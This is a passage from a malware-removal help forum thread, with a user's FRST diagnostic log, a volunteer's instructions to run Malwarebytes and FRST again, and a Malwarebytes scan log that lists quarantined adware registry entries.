HP SimplePass (HKLM-x32\...\{4BACA3B8-F63A-44ED-9A8D-48B4D02AD268}) (Version: 6.0.100.276 - Hewlett-Packard)
HP SimplePass Identity Protection (HKLM-x32\...\InstallShield_{E6CB67CC-71D2-46b9-8D43-A4641A9EECB2}) (Version: 6.5.5.20 - Egis Technology Inc.)
HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{23CCE784-A812-4647-AEFF-1DCCD4E57478}) (Version: 11.50.0000 - Hewlett-Packard Company)
HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)
HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6425.0 - IDT)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Media Suite (x32 Version: 10 - CyberLink Corp.) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2.5884 - Mozilla)
Norton Security (HKLM-x32\...\NS) (Version: 22.5.5.15 - Symantec Corporation)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.141.259 - Google, Inc.)
Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.2.612.2012 - Realtek)
Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.29034 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.95 - Synaptics Incorporated)
Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wondershare Video Converter Free(Build 6.5.1.0) (HKLM-x32\...\Wondershare Video Converter Free_is1) (Version: 6.5.1.0 - Wondershare Software)
Yahoo Browser Settings (HKLM-x32\...\Yahoo Browser Settings) (Version: - Yahoo! Inc.)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6302.0225\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {099EA545-0C53-45B7-AB54-CA2018855CAF} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)
Task: {164BC185-5AC3-49DD-9D98-0BA405318464} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)
Task: {1BEA3822-8B93-4F5B-B436-4811FCB531F5} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2012-11-05] (Hewlett-Packard Development Company, L.P.)
Task: {1C58E21A-1171-40B6-B0B7-1546A27AA771} - System32\Tasks\CLVDLauncher => C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe [2012-07-24] (CyberLink Corp.)
Task: {2BDE1E7E-8AA4-4DDB-82C2-DB181FDEED54} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-09] (Adobe Systems Incorporated)
Task: {4422E649-0CA1-4D11-9D8E-4F3D0246786D} - System32\Tasks\Norton Security\Norton Autofix => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {69B68B87-4EE3-45A7-A72C-A1EFFF4CEBC1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {78A8E711-9886-4157-AE31-7E585AAB241A} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2012-09-20] (Adobe Systems Incorporated)
Task: {82B26FB7-DABB-47F1-8079-1229C6C723B6} - System32\Tasks\Norton Security\Norton Error Processor => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {A5169291-4386-4125-8918-37E485684151} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-02-09] (Microsoft Corporation)
Task: {A6D352C7-BEDD-458F-81CB-152C8FEBAC74} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {AC20895B-0994-4365-8AE9-4EA91DCA9545} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\WSCStub.exe [2015-11-20] (Symantec Corporation)
Task: {B2AF2465-3FB6-4AB9-8916-8064970A2792} - System32\Tasks\Norton Security\Norton Error Analyzer => C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\SymErr.exe [2015-11-05] (Symantec Corporation)
Task: {D0FDAB6C-C95E-48AB-AA04-97C7CBD08F91} - System32\Tasks\Atofcuuu => C:\PROGRA~1\PHRASE~1\Aluts.bat
Task: {E4FAE6DB-741C-4D03-88F4-5CF3AD1ED864} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe
Task: {F46D7244-6DB6-42B8-9D4C-734C1F747184} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {FBE6FA96-A961-4CE0-A0B4-89A6B663D7BA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2015-10-30 01:18 - 2015-10-30 01:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-09-28 19:29 - 2012-03-27 21:49 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2012-09-06 03:47 - 2012-09-06 03:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2010-10-20 15:23 - 2010-10-20 15:23 - 08801632 _____ () C:\Program Files\Microsoft Office\Office14\1033\GrooveIntlResource.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-12-19 20:59 - 2015-12-19 20:59 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-12 12:12 - 2016-01-04 19:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 12:12 - 2016-01-04 19:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-27 17:28 - 2016-01-15 23:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-27 17:28 - 2016-01-15 23:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 12:55 - 2016-01-21 12:55 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2012-12-20 18:30 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2016-03-08 16:56 - 00000056 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 localhost
::1 localhost

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\levilaing\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\{9deef5e1-ccab-4b3d-bca1-455b50a6a967}.jpg
DNS Servers: 68.105.28.11 - 68.105.29.11
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run32: => "Price Finder"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeUpdater"
HKLM\...\StartupApproved\Run32: => "ShopAtHomeWatcher"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKLM\...\StartupApproved\Run32: => "BCSSync"
HKLM\...\StartupApproved\Run32: => "CanonQuickMenu"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "BitTorrent"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "Power2GoExpress8"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\StartupApproved\Run: => "SearchProtection"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== Restore Points =========================

09-02-2016 13:53:15 Windows Update
01-03-2016 13:01:54 Windows Update
01-03-2016 13:02:55 Windows Update
08-03-2016 16:48:57 Removed Bonjour
09-03-2016 17:44:29 JRT Pre-Junkware Removal

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (03/09/2016 05:44:46 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/09/2016 05:14:27 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program ns.exe version 13.0.2.6 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.

Process ID: e1c

Start Time: 01d17a55c29d78ee

Termination Time: 14

Application Path: C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe

Report Id: a616f939-e64c-11e5-bec4-a0b3cc48869f

Faulting package full name:

Faulting package-relative application ID:

Error: (03/08/2016 04:49:01 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Cryptographic Services failed while processing the OnIdentity() call in the System Writer Object.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Microsoft Link-Layer Discovery Protocol.

System Error:
Access is denied.
.

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 15625

Error: (03/07/2016 01:17:25 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9140

Error: (03/07/2016 01:17:19 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (03/04/2016 03:50:53 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 1109

System errors:
=============
Error: (03/09/2016 05:40:31 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: {784E29F4-5EBE-4279-9948-1E8FE941646D}

Error: (03/09/2016 05:36:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EraserSvc11511 service failed to start due to the following error:
%%2

Error: (03/09/2016 05:35:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The EgisTec Service service failed to start due to the following error:
%%1053

Error: (03/09/2016 05:35:58 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the EgisTec Service service to connect.

Error: (03/09/2016 05:35:36 PM) (Source: Microsoft-Windows-Directory-Services-SAM) (EventID: 16953) (User: NT AUTHORITY)
Description: The password notification DLL EgisDSPwdFilter failed to load with error 126. Please verify that the notification DLL path defined in the registry, HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages, refers to a correct and absolute path (<drive>:\<path>\<filename>.<ext>) and not a relative or invalid path. If the DLL path is correct, please validate that any supporting files are located in the same directory, and that the system account has read access to both the DLL path and any supporting files. Contact the provider of the notification DLL for additional support. Further details can be found on the web at http://go.microsoft..../?LinkId=245898.

Error: (03/09/2016 05:35:36 PM) (Source: Microsoft-Windows-Directory-Services-SAM) (EventID: 16953) (User: NT AUTHORITY)
Description: The password notification DLL EgisPwdFilter failed to load with error 126. Please verify that the notification DLL path defined in the registry, HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages, refers to a correct and absolute path (<drive>:\<path>\<filename>.<ext>) and not a relative or invalid path. If the DLL path is correct, please validate that any supporting files are located in the same directory, and that the system account has read access to both the DLL path and any supporting files. Contact the provider of the notification DLL for additional support. Further details can be found on the web at http://go.microsoft..../?LinkId=245898.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_52e0f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_52e0f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_52e0f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (03/09/2016 05:34:32 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_52e0f service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.

CodeIntegrity:
===================================
Date: 2016-03-01 13:39:04.692
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-15 11:48:03.432
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-02-09 21:20:12.135
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-28 15:09:07.207
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-19 20:04:09.326
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-12 14:52:54.813
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2016-01-06 07:51:33.186
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-31 10:57:24.742
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-28 11:47:23.759
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

Date: 2015-12-24 11:09:17.839
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core™ i5-3210M CPU @ 2.50GHz
Percentage of memory in use: 31%
Total physical RAM: 6033.27 MB
Available physical RAM: 4133.63 MB
Total Virtual: 6993.27 MB
Available Virtual: 5181.11 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:669.53 GB) (Free:596.76 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:27.14 GB) (Free:3.16 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 5CA0CBD1)

Partition: GPT.

==================== End of Addition.txt ============================

#10
pystryker

Posted 09 March 2016 - 06:22 PM

Trusted Helper

Malware Removal
3,912 posts

Hello

I see you had success in downloading JRT and getting it to run. :thumbsup:

I do see a file that refused to be shown the door in the initial fix, so we'll hit it with a bigger hammer.

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Step 1: Scan with Malwarebytes

Please download Malwarebytes Anti-Malware to your desktop
Install the progam and select Update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

Go back to the Dashboard and select Scan Now

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

On completion of the scan (or after the reboot), start MBAM,

Click History, then Application Logs, then check the Select box by the first Scan Log in the list and then click on the log to highlight it.

Click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.

Note: If is essential you reboot the machine before running the next step.

Step 2: Fresh FRST Scan

Start Farbar's Recovery Scan Tool and press the Scan button.
FRST will scan your system and produce two logs: FRST.txt and Addition.txt. Please post them in your next reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

MBAM Log
Fresh FRST.txt Log
Fresh Addition.txt Log

#11
LLL31

Posted 09 March 2016 - 07:57 PM

Member

Topic Starter
Member
15 posts

I didnt see where a new addition log was created. Just the old one

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 6:33 PM
Logfile: MBAM.txt
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.09.06
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: levilaing

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 375956
Time Elapsed: 43 min, 31 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 33
PUP.Optional.MySearchDial, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, Quarantined, [7e3c622386136fc72bb3427736cc5da3],
PUP.Optional.MySearchDial, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{77AA745B-F4F8-45DA-9B14-61D2D95054C8}, Quarantined, [7e3c622386136fc72bb3427736cc5da3],
PUP.Optional.MindSpark, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{65C72339-FB1D-4155-84E1-9AFACEE02D6F}, Quarantined, [79413b4a3d5c55e1a3d88335f70b7e82],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\CouponXplorer_5z.SkinLauncherSettings, Quarantined, [8a30e79eb2e7c0765d453383a161b14f],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\CouponXplorer_5z.SkinLauncherSettings.1, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CouponXplorer_5z.SkinLauncherSettings, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CouponXplorer_5z.SkinLauncherSettings.1, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CouponXplorer_5z.SkinLauncherSettings, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CouponXplorer_5z.SkinLauncherSettings.1, Quarantined, [e2d8661f2475dc5a940e7046ba4838c8],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.CiimLheamojbad, Quarantined, [befcb7ce742570c6911853ba897a42be],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.CiimLheamojbad.1, Quarantined, [a6148df8f9a0181e6247030a36cd7789],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.DodpGuokdos, Quarantined, [8d2de4a1ebaed3633d6ccd40b35030d0],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.DodpGuokdos.1, Quarantined, [efcb364f3a5fd2644f5a37d6fd06a65a],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.JacCodwugeif, Quarantined, [6555374ea6f3fc3a21885db058abdb25],
